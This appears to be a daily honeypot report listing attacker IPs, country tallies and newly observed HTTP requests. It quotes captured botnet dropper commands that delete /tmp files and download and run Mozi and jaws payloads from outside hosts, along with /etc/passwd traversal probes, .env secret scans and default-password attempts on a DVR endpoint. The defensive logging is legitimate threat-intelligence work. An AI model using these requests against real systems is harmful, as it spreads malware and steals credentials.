Skip to main content
  1. Daily-Posts/

Report: 2025-05-21

·512 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-21
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 46 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1298 requests were recorded during the day, originating from 2 different countries, with a peak of 199 requests coming from BG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
156.218.77.123GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.62/jaws;sh+/tmp/jaws HTTP/1.1
117.209.127.246GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.209.127.246:60642/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
165GET /@fs/etc/passwd?raw?? HTTP/1.1
185GET /@fs/C://windows/win.ini?import&?inline=1.wasm?init HTTP/1.1
235GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
245GET /@fs/C://windows/win.ini?raw?? HTTP/1.1
1701GET /OdinHttpCall1747824619 HTTP/1.1
1711GET /Odin/http/call1747824619 HTTP/1.1
1991GET /odinhttpcall1747823621 HTTP/1.1
2001GET /OdinHttpCall1747823621 HTTP/1.1
2011GET /Odin/http/call1747823621 HTTP/1.1
2051GET /odinhttpcall1747824619 HTTP/1.1
2551GET /Api/v2/.env HTTP/1.1
2561GET /Apis/.env HTTP/1.1
2781GET /Client/.env HTTP/1.1
2791GET /Club/.env HTTP/1.1
2801GET /Cms/.env HTTP/1.1
2811GET /Community/.env HTTP/1.1
2831GET /Contact/.env HTTP/1.1
2891GET /App/config/.env HTTP/1.1
2961GET /Content/.env HTTP/1.1
3351GET /odinhttpcall1747793069 HTTP/1.1
3361GET /OdinHttpCall1747793069 HTTP/1.1
3371GET /Odin/http/call1747793069 HTTP/1.1
3441GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22Admin123%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3451GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22admin1234%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3461GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22Admin1234%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3471GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%221234567a%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3481GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22123456a@%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3491GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22123abc456%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3501GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22abcd1234%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3511GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22Autism321%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3521GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22Password%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3641GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22admin123%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3651GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22admin123456%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3771GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22123456%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3871GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%221234%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
3881GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%2212345%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
4001GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%22%22%20squ=%22%22%20dir=%220%22%3E%3Crpermission%20usr=%22admin%22%20pwd=%22Admin%22%3E%3Cconfig%20base=%22%22/%3E%3Cplayback%20base=%22%22/%3E%3C/rpermission%3E%3C/juan%3E HTTP/1.1
4041GET /Apps/.env HTTP/1.1
4051GET /Assets/.env HTTP/1.1
4061GET /Auth/.env HTTP/1.1
4071GET /Awstats/.env HTTP/1.1
4081GET /Back/.env HTTP/1.1
4331GET /app_dev.php/_profiler/.env HTTP/1.1
4831GET /odinhttpcall1747825414 HTTP/1.1
4841GET /OdinHttpCall1747825414 HTTP/1.1
4851GET /Odin/http/call1747825414 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0199BG
1196US
2164CA
3152DE
4106CN
591GB
667IN
756PL
850NL
950FR
1028HK
1116SC
1213TH
1312LT
1411VN
1511PT
1610SG
179CH
188GH
197UA
205AZ
214RO
223ES
233BE
243AO
253ZA
262VE
272KR
282JP
292ZM
302IT
312IL
322BR
332ID
341AF
351LV
361AR
371EG
381SE

Related

Report: 2025-05-20
·411 words
Repport Daily
Report: 2025-05-19
·443 words
Repport Daily
Report: 2025-05-18
·4142 words
Repport Daily